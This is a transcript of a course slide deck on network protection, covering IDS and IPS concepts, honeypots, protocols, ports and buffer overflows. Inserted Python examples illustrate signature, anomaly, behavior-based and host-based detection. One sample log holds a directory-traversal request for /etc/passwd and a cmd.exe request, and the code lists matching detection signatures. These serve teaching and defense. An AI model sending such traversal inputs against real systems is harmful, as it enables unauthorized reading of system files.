
CIST 1601 Information Security Fundamentals

CIST 1601 Information Security Fundamentals. Chapter 3 Protecting Networks. Collected and Compiled By JD Willard MCSE, MCSA, Network+, Microsoft IT Academy Administrator Computer Information Systems Technology Albany Technical College.

Presentation Transcript


  1. CIST 1601 Information Security Fundamentals Chapter 3 Protecting Networks Collected and Compiled By JD Willard MCSE, MCSA, Network+, Microsoft IT Academy Administrator Computer Information Systems Technology Albany Technical College

  2. Monitoring the Network Recognizing the Different Types of Network Traffic Novell Protocols NetWare, a server-based networking environment/operating system, offers network protocols, services, and applications. NetWare is susceptible to DoS attacks. In addition to TCP/IP, NetWare supports two other proprietary protocols, Internetwork Packet Exchange (IPX) and Sequenced Packet Exchange (SPX), which are unique to NetWare 4.x and earlier Novell networks. Since NetWare 5, NetWare has been able to use TCP/IP as its only transport protocol. IPX and SPX are fast, efficient, and well documented. They’re also susceptible to communications interception using internal monitoring. Microsoft created NWLink, an IPX/SPX-compatible protocol that it owns. NetWare Directory Services (NDS) manages all the resources in a network. NDS provides a database of all network objects or resources.

  3. Monitoring the Network Recognizing the Different Types of Network Traffic The figure below shows an NDS tree. Notice that the NDS tree treats print devices, disk volumes, users, and groups as leaf objects, or resources, in the tree. Earlier versions of NetWare used bindery services; the bindery kept track of resources on a server-by-server basis. In the most recent versions of NetWare, NDS has been expanded and renamed eDirectory.

  4. Monitoring the Network Recognizing the Different Types of Network Traffic Microsoft Protocols NetBIOS The biggest vulnerability with NetBIOS is that it opens ports for file and print sharing. These ports (which can include 135 through 139 and 445) can be accessed across the Internet as well as by devices on the local LAN. NetBEUI NetBEUI is a nonroutable protocol, meaning that it can’t be sent across routers. NetBEUI traffic is easy to intercept internally using a network sniffer. WINS Service Windows Internet Naming Service (WINS) translates NetBIOS names to TCP/IP addresses. Because WINS is providing a service to clients who request information from it, it’s susceptible to DoS attacks. When left unpatched, it is also exposed to remote code execution. WINS Server resolving a TCP/IP address to a NetBIOS name

  5. Monitoring the Network Recognizing the Different Types of Network Traffic Network File System Protocol Network File System (NFS) is the default file-sharing protocol for Unix systems. NFS allows a remote user to mount drives on a machine in the network. To be secure, NFS requires special configuration. NFS is equivalent to Distributed File System (DFS), which tends to exist outside of the Unix world. The Apple Protocol Most manufacturers support AppleTalk, which isn’t intended for secure applications. Modern Macintosh systems can also use TCP/IP for connections. Most AppleTalk vulnerabilities are exploitations of programs that offer this service. For example, there are known vulnerabilities with programs that allow Linux to offer AppleTalk, but those weaknesses are with the programs themselves and not with AppleTalk per se. A remote system mounting a drive on a local machine using NFS.

  6. Monitoring Network Systems Monitoring can occur on individual systems, on servers, or as a separate component of the network. The connection used is called a tap. The figure below illustrates some of the places where a network tap can occur. Each tap location presents a different view of the network. For effective security, multiple taps are probably needed. Your system faces both internal and external threats. Heavy traffic makes it necessary to dedicate personnel to monitoring. Network activity is also reported in system logs and audit files. It’s a good practice to periodically review these files. Automated tools make this process more manageable. Network sniffers and NIDSs are used to monitor network traffic. Network sniffers are manually oriented, whereas an NIDS can be automated. Tap locations used to monitor network traffic

  7. Monitoring and Diagnosing Networks Network Monitors Network monitors, otherwise called sniffers, were originally introduced to help troubleshoot network problems. Examining the signaling and traffic that occurs on a network requires a network monitor. Network monitors are now available for most environments, and they’re effective and easy to use. Today, a network-monitoring system usually consists of a PC with a NIC (running in promiscuous mode) and monitoring software. Microsoft Network Monitor is a packet analyzer. It enables capturing, viewing, and analyzing network data and deciphering network protocols. It can be used to troubleshoot network problems and applications on the network. The monitoring software is menu driven, easy to use, and has a big help file. The traffic displayed by sniffers can become overly involved and require additional technical materials which you can find on the Internet for free. With a few hours of work, most people can make network monitors work efficiently and use the data they present. Microsoft Network Monitor

  8. Monitoring and Diagnosing Networks Intrusion Detection Systems An IDS and a firewall working together to secure a network An IDS (Intrusion Detection System) is a hardware device with software that monitors events in a system or network to identify when intrusions are taking place. IDSs are designed to analyze data, identify attacks, and respond to the intrusion. An IDS can run on network devices and on individual workstations. You can configure the IDS to monitor for suspicious network activity, check system logs, perform stateful packet matching, and disconnect sessions that are violating your security policy. An IDS is used to protect the network and report network abnormalities to a network administrator or system. It works with audit files and rule-based processing to determine how to act in the event of an unusual situation on the network. IDSs are different from firewalls in that firewalls control the information that gets in and out of the network, whereas IDSs can identify unauthorized activity. IDSs are also designed to catch attacks in progress within the network, not just on the boundary between private and public networks. If the firewall were compromised, the IDS would notify you based on the rules it’s designed to implement. In the event the firewall is compromised or penetrated, the IDS can react by disabling systems, ending sessions, and even potentially shutting down your network. The main types are the host-based IDS and the network IDS. With a host-based IDS, software runs on the host computer system to monitor machine logs, system logs, and how applications interoperate. With a network IDS, the IDS checks for network traffic and traffic patterns that could be indicative of attacks such as port scans and denial-of-service attacks.

  9. Understanding Intrusion Detection Systems Intrusion detection (ID) is the process of monitoring events in a system or network to determine if an intrusion is occurring. An intrusion is defined as any activity or action that attempts to undermine or compromise the confidentiality, integrity, or availability of resources. An IDS reports and monitors intrusion attempts. An IDS will announce an event through an alert when suspicious activity is encountered.

  10. Understanding Intrusion Detection Systems An activity is an element of a data source that is of interest to the operator. This is usually a specific occurrence or event. The administrator is the person responsible for making decisions about the deployment and configuration of the IDS, alarm levels, historical logging, and session monitoring capabilities, and for determining the appropriate responses to attacks and ensuring that those responses are carried out. An alert is the message from an IDS analyzer indicating that something of interest has happened, that is, that an event has occurred. Alerts occur when activities of a certain type exceed a preset threshold. The analyzer is the component that analyzes the data collected by the sensor. The analyzer function uses data sources from sensors to analyze and determine whether an attack is under way. The data source is the raw information used by the IDS to detect suspicious activity. Data sources include audit files, system logs, or current network activity. An event is an occurrence in the data source that indicates suspicious activity. Not every activity ends up as an event, and not every event generates an alert. The event might trigger an alert if a deviation from normal network traffic patterns occurred or if an activity threshold was crossed. The manager is the component that the operator uses to manage the IDS. The manager may be a graphical interface, a real-time traffic screen, or a command-line-driven environment. Notification is the process or method by which the IDS manager makes the operator aware of an alert. This might include a graphic display or an e‑mail sent to the administrative staff. The operator is the person primarily responsible for the IDS. A sensor collects data from the data source and passes it on to the analyzer. If the analyzer determines that unusual activity has occurred, an alert may be generated. The components of an IDS working together to provide network monitoring

  11. Understanding Intrusion Detection Systems A signature-based system, also commonly known as a misuse-detection IDS (MD-IDS), is primarily focused on evaluating attacks based on a known identity, attack signature, or audit trail. All attack signatures are contained in a signature database. The signature database must be updated to remain effective. The user can examine the signature database and quickly determine which intrusive activity the misuse detection system is programmed to alert on. Signature-based systems have an advantage because of their simplicity and their ability to operate online in real time. Other advantages include a low number of false positives, detailed text logs, and use of few system resources. Signature-based detection has several limitations, including being based excessively on passive monitoring and needing constant updates to the rule sets. They can detect only known attacks with identified signatures. A signature-based IDS in action
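The pipeline of slide 10 (data source, sensor, analyzer, alert, notification) and the signature database of slide 11 can be shown together in a few dozen lines. This is an added illustration, not code from the course; the log format, the two signatures, the failed-login threshold of 3 and the sample lines are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample data source: web-server access lines "src method path status".
# Not real traffic; built to exercise each rule below.
SAMPLE_LOG = """\
10.0.0.5 GET /index.html 200
10.0.0.9 GET /static/../../etc/passwd 404
10.0.0.9 GET /tools/cmd.exe 404
10.0.0.7 POST /login 401
10.0.0.7 POST /login 401
10.0.0.7 POST /login 401
10.0.0.7 POST /login 401
10.0.0.9 GET /export?range=all 200
10.0.0.5 GET /about.html 200
"""

# Signature database: name -> compiled pattern. An operator can read this table
# and see exactly which intrusive activity the IDS is programmed to alert on.
# Anything without an entry here (the /export request above) is never reported.
SIGNATURE_DB = [
    ("directory-traversal", re.compile(r"\.\./|%2e%2e%2f", re.IGNORECASE)),
    ("cmd.exe-in-request", re.compile(r"cmd\.exe", re.IGNORECASE)),
]

# Threshold rule (assumed value): failed logins from one source are events,
# but they only become an alert once the count exceeds this number.
FAILED_LOGIN_THRESHOLD = 3

LINE_RE = re.compile(r"^(?P<src>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})$")


def sensor(raw_log):
    """Sensor: read the data source and hand structured activities to the analyzer."""
    activities = []
    for line in raw_log.splitlines():
        m = LINE_RE.match(line)
        if m:  # malformed lines are dropped rather than crashing the sensor
            activities.append({"src": m["src"], "path": m["path"], "status": int(m["status"])})
    return activities


def analyzer(activities):
    """Analyzer: apply the signature database and the threshold rule; return alerts."""
    alerts = []
    failed_logins = defaultdict(int)
    for act in activities:
        # Misuse detection: compare the request against every known signature.
        for name, pattern in SIGNATURE_DB:
            if pattern.search(act["path"]):
                alerts.append({"signature": name, "src": act["src"], "detail": act["path"]})
        # Threshold rule: each 401 is an event; the alert fires once, when the
        # count first exceeds the threshold, not on every later failure.
        if act["status"] == 401:
            failed_logins[act["src"]] += 1
            if failed_logins[act["src"]] == FAILED_LOGIN_THRESHOLD + 1:
                alerts.append({"signature": "repeated-failed-login", "src": act["src"],
                               "detail": f"{failed_logins[act['src']]} failures"})
    return alerts


def notify(alerts):
    """Notification: render alerts as the lines an operator console would show."""
    return [f"ALERT {a['signature']} from {a['src']} ({a['detail']})" for a in alerts]


def run_ids(raw_log):
    """Data source -> sensor -> analyzer -> notification, as on slide 10."""
    return notify(analyzer(sensor(raw_log)))


if __name__ == "__main__":
    for line in run_ids(SAMPLE_LOG):
        print(line)
```

The /export request from 10.0.0.9 is never reported because no signature describes it, which is the "known attacks only" limitation of slide 11 in action.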

  12. Understanding Intrusion Detection Systems An anomaly-detection IDS (AD-IDS) detects any changes or deviations in network traffic. It is also called statistical anomaly detection. Anomaly detection is analogous to credit card fraud detection: credit card companies maintain “spending profiles” for their customers. Anomaly detectors work by creating profiles or models of the normal behavior pattern of individual users, hosts, or network connections. There is an initial learning period before anomalies can be detected. Once the baselines are established, anomaly-based monitoring can detect anomalies. Sometimes the baseline is established through a manual process. The classifications of anomaly detection techniques include statistical methods, rule-based methods, distance-based methods, profiling methods, and model-based approaches. Anomaly-based monitoring is useful for detecting these types of attacks: protocol and port exploitation; new exploits or buffer overflow attacks; DoS attacks based on payloads or volume; normal network failures; variants of existing attacks in new environments. Highly secure environments might use complex patterns of behavior analysis, in some cases learning individual patterns of use common to each user profile, so that variations can be identified. One of the disadvantages of anomaly-based IDS is that it generates false positives because the pattern of behavior can vary, or the pattern of behavior is too dynamic to analyze properly. AD-IDS using expert system technology to evaluate risks
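The statistical form of anomaly detection described above, as an added example rather than course material: a per-host profile (mean and spread of requests per minute) is learned over a fixed learning period, after which each new observation is scored as a number of standard deviations from the profile. The host names, counts, the 10-minute learning window, the 3-sigma threshold and the 1 request/minute spread floor are all assumptions of this example.

```python
import statistics

# Constructed per-host request counts, one value per minute (not real data).
# The first LEARNING_MINUTES values of each series are the learning period.
LEARNING_MINUTES = 10
SAMPLE_COUNTS = {
    "web-01": [50, 52, 48, 51, 49, 50, 53, 47, 50, 51,   # learning period
               52, 49, 400, 50, 51],                     # 400: volume anomaly (flood-like)
    "db-01":  [5, 6, 5, 4, 6, 5, 5, 6, 4, 5,
               5, 6, 5, 30, 5],                          # 30: legitimate nightly job, still flagged
}


def build_baseline(values):
    """Learning period: the host's profile is the mean and spread of its normal rate."""
    mean = statistics.mean(values)
    stdev = statistics.pstdev(values)
    # A perfectly constant learning period would make every change infinitely
    # anomalous; assume a minimum spread of 1 request/minute (our choice).
    return {"mean": mean, "stdev": max(stdev, 1.0)}


def zscore(value, baseline):
    """How many standard deviations a new observation sits from the profile."""
    return (value - baseline["mean"]) / baseline["stdev"]


def detect_anomalies(counts, learning=LEARNING_MINUTES, threshold=3.0):
    """Return {host: [(minute, value, z)]} for observations beyond the threshold.

    Observations inside the learning period are never reported: the detector
    has no baseline yet, which is the initial blind spot the slide describes.
    """
    findings = {}
    for host, series in counts.items():
        if len(series) <= learning:
            raise ValueError(f"{host}: need more than {learning} samples to learn a baseline")
        baseline = build_baseline(series[:learning])
        hits = []
        for minute, value in enumerate(series[learning:], start=learning):
            z = zscore(value, baseline)
            if abs(z) > threshold:
                hits.append((minute, value, round(z, 1)))
        findings[host] = hits
    return findings


if __name__ == "__main__":
    print(detect_anomalies(SAMPLE_COUNTS))
```

The db-01 finding is the false positive the slide warns about: a legitimate once-a-night job that was absent from the learning period looks exactly like an attack to a purely statistical profile.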

  13. Understanding Intrusion Detection Systems Behavior-based monitoring works by looking at the way certain executable files make your computer behave. It determines whether a program is malicious by inspecting the stream of system calls that the program issues to the operating system. This monitoring method can be used to identify internal misuse by recognizing actions outside of normal access patterns or authorized events occurring outside of normal profile usage, such as the access of protected files during off hours. Behavior-based monitoring is not likely to produce a false alert because you define the non-acceptable behavior. Rules must be in place. If you do not properly define inappropriate behaviors, then attacks can occur. When you define a rule that prevents an e-mail client from executing the cmd.exe command and alerts you when this is attempted, you are using behavior-based monitoring. Behavior-based monitoring advantages include the following: it can identify malware before it is added to signature files, monitor for malware activities, and learn about malware based on previous detection. Behavior-based detection has several limitations, including a high incidence of false alarms and slow file checking.
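The two behaviors named on this slide, an e-mail client launching cmd.exe and a protected file being opened during off hours, written as explicit rules over constructed events. This is an added example, not course code; the event format, the set of e-mail clients, the protected file paths, the 08:00 to 17:59 business hours and the sample events are all assumptions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """One observed action. Constructed for this example, not a real telemetry format."""
    kind: str    # "process": a program started another program; "file": a user opened a file
    actor: str   # parent process image for "process" events, user name for "file" events
    target: str  # child process image, or the file path opened
    hour: int    # local hour of day, 0-23


EMAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
PROTECTED_FILES = {r"C:\Finance\payroll.xlsx", "/srv/hr/salaries.csv"}
BUSINESS_HOURS = range(8, 18)  # 08:00-17:59; assumed for this example

# Behavior rules: (name, action, predicate). The predicates *are* the definition
# of non-acceptable behavior; anything they do not describe is never caught.
RULES = [
    ("email-client-spawns-cmd", "block",
     lambda e: e.kind == "process" and e.actor.lower() in EMAIL_CLIENTS
     and e.target.lower() == "cmd.exe"),
    ("protected-file-off-hours", "alert",
     lambda e: e.kind == "file" and e.target in PROTECTED_FILES
     and e.hour not in BUSINESS_HOURS),
]


def evaluate(event):
    """Return [(rule_name, action)] for every rule this event violates (empty = allowed)."""
    return [(name, action) for name, action, pred in RULES if pred(event)]


def monitor(events):
    """Run every event through the rules; return a summary the operator can act on."""
    summary = {"blocked": [], "alerted": [], "allowed": []}
    for e in events:
        hits = evaluate(e)
        if any(action == "block" for _, action in hits):
            summary["blocked"].append(e)
        elif hits:
            summary["alerted"].append(e)
        else:
            summary["allowed"].append(e)
    return summary


# Constructed events (not real telemetry).
SAMPLE_EVENTS = [
    Event("process", "explorer.exe", "outlook.exe", 9),       # user opens mail: normal
    Event("process", "outlook.exe", "cmd.exe", 10),           # rule 1: blocked and reported
    Event("process", "outlook.exe", "wscript.exe", 10),       # no rule covers this: allowed (a gap)
    Event("file", "jsmith", r"C:\Finance\payroll.xlsx", 14),  # protected file in business hours: normal
    Event("file", "jsmith", r"C:\Finance\payroll.xlsx", 2),   # same file at 02:00: rule 2 alerts
]

if __name__ == "__main__":
    for outcome, evs in monitor(SAMPLE_EVENTS).items():
        print(outcome, [e.target for e in evs])
```

The third event shows the slide's caveat about rules that are not properly defined: the rule names cmd.exe only, so a different interpreter started by the same mail client passes as allowed, and the rule set has to be widened to whatever the policy actually intends to forbid.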

  14. Working with a Network-Based IDS The primary advantage of a network-based IDS (N-IDS) is the low maintenance involved in analyzing traffic in the network. An NIDS is easy and economical to manage because the signatures are not configured on all the hosts in a network segment. Violations of policy, monitoring of all HTTP traffic, and monitoring of all FTP traffic are examples of the types of information an NIDS is designed to monitor. An NIDS is not capable of analyzing encrypted information. For example, the packets that travel through a VPN cannot be analyzed by the NIDS. The lack of this capability is a primary disadvantage of an NIDS. The performance of an NIDS can be affected in a switched network environment because the NIDS cannot analyze traffic that the switch does not forward to the port on which the NIDS resides. Two basic types of responses can be formulated at the network level: passive and active.

  15. Working with a Network-Based IDS N-IDS placement in a network determines what data will be analyzed A network-based IDS (N-IDS) approach to IDS attaches the system to a point in the network where it can monitor and report on all network traffic. Placing the N-IDS in front of the firewall provides monitoring of all network traffic going into the network. Putting the N-IDS behind the firewall only allows you to see the traffic that penetrates the firewall. The best solution for creating a secure network is to place an IDS both in front of and behind the firewall. The N-IDS can be attached to a switch or a hub, or it can be attached to a tap. Intrusion is monitored on the network segment on which the NIDS is placed, and not on individual systems. A hub being used to attach the N-IDS to the network

  16. Implementing a Passive Response A passive response is the most common type of response to many intrusions and the easiest and cheapest to develop and implement. A passive threat response does nothing to prevent the threat or attack; it just acknowledges that one is happening or is about to happen. The following list includes some passive response strategies. Logging involves gathering sufficient information on the attack to assist administrators in implementing measures to divert it. Logging usually involves recording events and the circumstances under which they occurred. Notification involves informing the designated administrator when a security-related event occurred and communicating information on the event. If the IDS is manned full time, messages can be displayed on the manager’s console to indicate that the situation is occurring. Shunning basically involves ignoring the attack because the specific attack will not work. The IDS can make a note of it in a log and move on to other, more pressing business.

  17. Implementing an Active Response An active response involves taking an action based on an attack or threat. An active response will include one of the reactions briefly described here: Terminating processes or sessions If a flood attack is detected, the IDS can cause the subsystem, such as TCP, to force resets to all the sessions that are under way. IDS instructing TCP to reset all connections

  18. Implementing an Active Response Network configuration changes If a certain IP address or a particular socket or port is being attacked, the IDS can instruct a border router or firewall to reject any requests or traffic from that address or port. This configuration change can remain in effect permanently or for a specified period. IDS instructing the firewall to close port 80 for 60 seconds to thwart an IIS attack
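The passive responses of slide 16 (logging, notification, shunning) and the active responses of slides 17 and 18 (session resets, and a network configuration change that is either permanent or expires after a set period) as one small response engine. This is an added example, not course code; the signature names, the decision policy in respond(), the 60-second port block and the scripted scenario in demo() are all assumptions, and the clock is injected so the timed block can be checked without waiting.

```python
import time


class ResponseEngine:
    """Maps analyzer alerts to passive or active responses. `clock` returns seconds."""

    def __init__(self, clock=time.time):
        self.clock = clock
        self.log = []            # passive: logging
        self.notifications = []  # passive: notification
        self.resets = []         # active: sessions the IDS told TCP to reset
        self.blocks = {}         # active: rule -> expiry timestamp (None = permanent)

    # --- passive responses -----------------------------------------------
    def record(self, alert, note):
        self.log.append((self.clock(), alert["signature"], alert["src"], note))

    def notify(self, alert):
        self.notifications.append(f"{alert['signature']} from {alert['src']}")

    def shun(self, alert, reason):
        # The attack cannot succeed here, so note it and move on.
        self.record(alert, f"shunned: {reason}")

    # --- active responses ------------------------------------------------
    def reset_session(self, alert):
        self.resets.append(alert["session"])
        self.record(alert, "session reset")

    def block(self, alert, rule, seconds=None):
        # Network configuration change: permanent when seconds is None,
        # otherwise withdrawn once the period has elapsed.
        self.blocks[rule] = None if seconds is None else self.clock() + seconds
        self.record(alert, f"blocked {rule} " + ("permanently" if seconds is None else f"for {seconds}s"))

    def is_blocked(self, rule):
        if rule not in self.blocks:
            return False
        expiry = self.blocks[rule]
        if expiry is not None and self.clock() >= expiry:
            del self.blocks[rule]  # period elapsed: rule withdrawn
            return False
        return True

    # --- policy (assumed for this example) -------------------------------
    def respond(self, alert, target_runs_iis):
        sig = alert["signature"]
        if sig == "iis-attack" and not target_runs_iis:
            self.shun(alert, "target does not run IIS")
            return "shunned"
        if sig == "iis-attack":
            self.block(alert, f"dst-port:{alert['dst_port']}", seconds=60)
            self.notify(alert)
            return "blocked-temporarily"
        if sig == "syn-flood":
            self.reset_session(alert)
            self.block(alert, f"src:{alert['src']}")
            self.notify(alert)
            return "blocked-permanently"
        self.record(alert, "logged only")
        self.notify(alert)
        return "passive"


def demo():
    """Scripted scenario with a fake clock (no sleeping); returns what happened."""
    now = [1_000.0]
    eng = ResponseEngine(clock=lambda: now[0])
    iis = {"signature": "iis-attack", "src": "203.0.113.9", "dst_port": 80, "session": "s1"}
    flood = {"signature": "syn-flood", "src": "198.51.100.4", "dst_port": 25, "session": "s2"}
    scan = {"signature": "port-scan", "src": "203.0.113.9", "dst_port": 22, "session": "s3"}
    out = {}
    out["iis-attack-on-non-iis"] = eng.respond(iis, target_runs_iis=False)
    out["iis-attack-on-iis"] = eng.respond(iis, target_runs_iis=True)
    out["port80-blocked-now"] = eng.is_blocked("dst-port:80")
    now[0] += 61  # the 60-second period elapses
    out["port80-blocked-later"] = eng.is_blocked("dst-port:80")
    out["flood"] = eng.respond(flood, target_runs_iis=True)
    now[0] += 86_400
    out["flood-src-blocked-next-day"] = eng.is_blocked("src:198.51.100.4")
    out["scan"] = eng.respond(scan, target_runs_iis=True)
    out["resets"] = list(eng.resets)
    out["notifications"] = len(eng.notifications)
    return out


if __name__ == "__main__":
    print(demo())
```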

  19. Implementing an Active Response Deception A deception active response fools the attacker into thinking the attack is succeeding while the system monitors the activity and potentially redirects the attacker to a system that is designed to be broken. This allows the operator or administrator to gather data about how the attack is unfolding and the techniques being used in the attack. This process is referred to as sending them to the honeypot. It’s dangerous to allow a hacker to proceed into your network, even if you’re monitoring the events. This approach is frequently used when law enforcement is gathering evidence to ensure a successful prosecution of the attacker. A network honeypot deceives an attacker and gathers intelligence

  20. Working with a Host-Based IDS A Host Intrusion Detection System (HIDS) is designed to detect hacker attacks on a single computer system. HIDS software is installed on each host that needs IDS capabilities. Because the HIDS is installed on the local computer, the computer is completely compromised once a hacker penetrates the HIDS software. A HIDS can monitor network traffic specific to the host, checksums of important system files, ports used by the system or incoming connections, and processes running on the system. A HIDS can include filters and antivirus modules. HIDSs are good at detecting unauthorized file modifications and user activity. A HIDS runs on a host in the network to monitor communications, monitor system logs and file systems, and detect suspicious activities, including failed login attempts. A host-based IDS cannot see information within encrypted tunnels. To monitor the internal network and external traffic, NIDSs and HIDSs should be used together. A host-based IDS interacting with the operating system
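The "checksums of important system files" capability named above, as an added example rather than course code: a baseline of SHA-256 digests is taken while the host is known-good and later compared against a fresh snapshot to report modified, missing and added files. The throwaway directory, its three files and the tampering in demo() are constructed for the example.

```python
import hashlib
import os
import tempfile


def hash_file(path, chunk_size=65536):
    """SHA-256 of a file, read in chunks so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(directory):
    """Checksum every file under `directory`; keys are paths relative to it."""
    result = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            result[os.path.relpath(full, directory)] = hash_file(full)
    return result


def compare(baseline, current):
    """Diff a stored baseline against a fresh snapshot."""
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def _write(directory, name, text):
    with open(os.path.join(directory, name), "w") as fh:
        fh.write(text)


def demo():
    """Build a throwaway 'system' directory, baseline it, tamper with it, re-check."""
    with tempfile.TemporaryDirectory() as d:
        _write(d, "hosts", "127.0.0.1 localhost\n")
        _write(d, "sshd_config", "PermitRootLogin no\n")
        _write(d, "motd", "Authorized use only.\n")
        baseline = snapshot(d)                              # taken while known-good
        _write(d, "sshd_config", "PermitRootLogin yes\n")   # setting changed
        os.remove(os.path.join(d, "motd"))                  # file deleted
        _write(d, "rogue.so", "not really a library\n")     # file planted
        return compare(baseline, snapshot(d))


if __name__ == "__main__":
    print(demo())
```

Because the HIDS lives on the host it watches (the slide's point about the computer being fully compromised once the HIDS is), the baseline has to be kept somewhere the host cannot rewrite it, such as a signed copy on the monitoring server.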

  21. Working with NIPS A network intrusion prevention system (NIPS) detects network intrusion attempts and controls access to the network for the intruders. A NIPS is an improvement over an IDS because an IPS actually prevents intrusion. An inline NIPS works like a Layer 2 bridge. It sits between the systems that need to be protected and the rest of the network. NIPS proactively protect machines against damage from attacks that signature-based technologies cannot detect, as most NIPS solutions have the ability to look at application layer protocols such as HTTP, FTP, and SMTP. When implementing a NIPS, keep in mind that the sensors must be physically inline to function properly. This adds a single point of failure to the network. A good way to prevent this issue is to use fail-open technology. This means that if the device fails, it does not cause a complete network outage; instead, it acts like a patch cable.

  22. Utilizing Honeypots Honeypots are computer systems designed to be vulnerable points of attack on a separate network away from the corporate network. Honeypots lure a hacker by appearing to be a legitimate server with security holes that are ripe and ready for exploitation. A honeypot simulates a network of vulnerable devices and has logging and tracing enabled. To attract hackers, a honeypot has its security level purposefully set quite low, so as to draw attackers to it and divert them from the private network. This security technique is used to allow administrators to observe hackers in action while not exposing vital network resources. Law enforcement agencies use honeypots to gather evidence for prosecution. A honeypot is most often deployed on the DMZ or screened subnet. When compared to IDSs and firewalls, honeypots are usually easier to configure and monitor. In addition, IDSs and firewalls collect vast quantities of information, while honeypots provide valuable information on only the specific attack. Before implementing a honeypot, you need to understand the concepts of enticement and entrapment. Enticement is the process of luring someone into your plan or trap. You might accomplish this by advertising that you have free software, or you might brag that no one can break into your machine. If you invite someone to try, you’re enticing them to do something that you want them to do. Entrapment is the process of encouraging an individual to perform an unlawful act that they wouldn’t normally have performed. While enticement is legally acceptable, entrapment isn’t. You should seek legal advice before you implement a honeypot on your network.

  23. Understanding Protocol Analyzers A protocol analyzer provides information regarding traffic flow and statistical information for your network. It is used to capture network traffic and generate statistics for creating reports. A protocol analyzer is a software utility used on a hub, a switch supervisory port, or inline with network connectivity to allow the analysis of network communications. Individual protocols, specific endpoints, or sequential access attempts may be identified using this utility. A protocol analyzer is also referred to as a network analyzer or packet sniffer. Windows Server operating systems come with a protocol analyzer called Network Monitor.

  24. Securing Workstations and Servers Workstations are particularly vulnerable in a network. Workstations communicate using services such as file sharing, network services, and applications programs. Many of these programs have the ability to connect to other workstations or servers. These connections are potentially vulnerable to interception and exploitation. The process of making a workstation or a server more secure is called platform hardening. The process of hardening the operating system is referred to as OS hardening. Platform hardening procedures can be categorized into three basic areas: Remove unused software, services, and processes from the workstations (for example, remove the server service from a workstation). These services and processes may create opportunities for exploitation. Ensure that all services and applications are up-to-date, including available service and security packs, and configured in the most secure manner allowed. This may include assigning passwords, limiting access, and restricting capabilities. Minimize information dissemination about the operating system, services, and capabilities of the system. Many attacks can be targeted at specific platforms once the platform has been identified. Many operating systems use default account names for administrative access. If at all possible, these should be changed. During a new installation of Windows Vista or Windows XP, the first user created is automatically added to the administrators group. Windows Vista then goes one step further and automatically disables the actual administrator account once another account belonging to the administrators group has been created.

  25. Securing Internet Connections Working with Ports and Sockets TCP/IP establishes connections and circuits using a combination of the IP address and a port. A port is an interface that is used to connect to a device. A socket is the combination of the IP address and the port. The socket identifies which application will respond to the network request. For example, if you attempt to connect to a remote system with the IP address 192.168.0.100, which is running a website, you’ll use port 80 by default. The combination of these two elements gives you a socket: 192.168.0.100:80. IP is used to route the information through the network. The four layers of TCP/IP encapsulate the information into a valid IP packet that is then transmitted across the network. The figure to the right illustrates the key components of a TCP packet requesting the home page of a website. The destination port is the port the data is sent to. In the case of a web application, the data for port addresses would both contain 80. The data field contains the value GET /. This value requests the home or starting page from the web server. In essence, this command or process requested the home page of the site 192.168.0.100 on port 80. The response is formed into another data packet that is passed down to IP and sent back to the originating system on port 1024. The connections to most services using TCP/IP are based on this port model.

  26. Securing Internet Connections Working with E-Mail The most common e‑mail systems use the following protocols, which use TCP for session establishment: Simple Mail Transport Protocol SMTP is a mail delivery protocol that is used to send e‑mail between an e‑mail client and an e‑mail server as well as between e‑mail servers. SMTP uses port 25. Post Office Protocol POP is a newer protocol that relies on SMTP for message transfer to receive e‑mail. POP3, the newest version of POP, allows messages to be transferred from the waiting post office to the e‑mail client. The current POP3 standard uses port 110. Internet Message Access Protocol IMAP is the newest player in the e‑mail field, and it’s rapidly becoming the most popular. Like POP, IMAP has a store-and-forward capability. IMAP allows messages to be stored on an e‑mail server instead of being downloaded to the client. It also allows messages to be downloaded based on search criteria. The current version IMAP 4 uses port 143. Each of these web services is offered in conjunction with web-enabled programs such as Flash and Java. These services use either a socket to communicate or a program that responds to commands through the browser. If your browser can be controlled by an application, your system is at great risk of attack. Servers are also vulnerable to this issue because they must process requests from browsers for information or data. The process of transferring an e‑mail message.

  27. Securing Internet Connections Working with the Web There are two common ways to provide secure connections between a web client and a web server: Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are the most widely used cryptographic protocols used to convey information between a web client and a server. The SSL protocol uses an encryption scheme between the two systems. The client initiates the session, the server responds, indicating that encryption is needed, and then they negotiate an appropriate encryption scheme. TLS is a newer protocol that merges SSL with other protocols to provide encryption. TLS supports SSL connections for compatibility, but it also allows other encryption protocols, such as Triple DES, to be used. SSL/TLS uses port 443 and TCP for connections. HTTP Secure (HTTP/S) is a protocol that is used for secure connections between two systems that use the Web. It protects the connection, and all traffic between the two systems is encrypted. HTTP/S uses SSL or TLS for connection security, and it uses port 443 and TCP for connections.

  28. Working with the Web ActiveX ActiveX is a technology that was implemented by Microsoft. ActiveX allows customized controls, icons, and other features to increase the usability of web enabled systems. ActiveX uses a method called authenticode for security. Authenticode is a type of certificate technology that allows ActiveX components to be validated by a server. ActiveX runs on the client. Web browsers can be configured so that they require confirmation to accept an ActiveX control. However, many users don’t understand these confirmation messages when they appear, and they automatically accept the components. Automatically accepting an ActiveX component or control creates the opportunity for security breaches on a client system when the control is used because an ActiveX control contains programming instructions that can contain malicious code or create vulnerabilities in a system.

  29. Working with the Web Buffer Overflows Perhaps the most popular method of privilege escalation is a buffer-overflow attack. Buffer overflows cause disruption of service and lost data. Buffer overflows occur when an application receives more data than it is programmed to accept. This situation can cause: An application to terminate. The termination may leave the system sending the data with temporary access to privileged levels in the attacked system. The overwriting of data or memory storage. A denial of service due to overloading the input buffer’s ability to cope with the additional data. Or the originator can execute arbitrary code, often at a privileged level. A buffer overflow is targeted toward an individual machine.

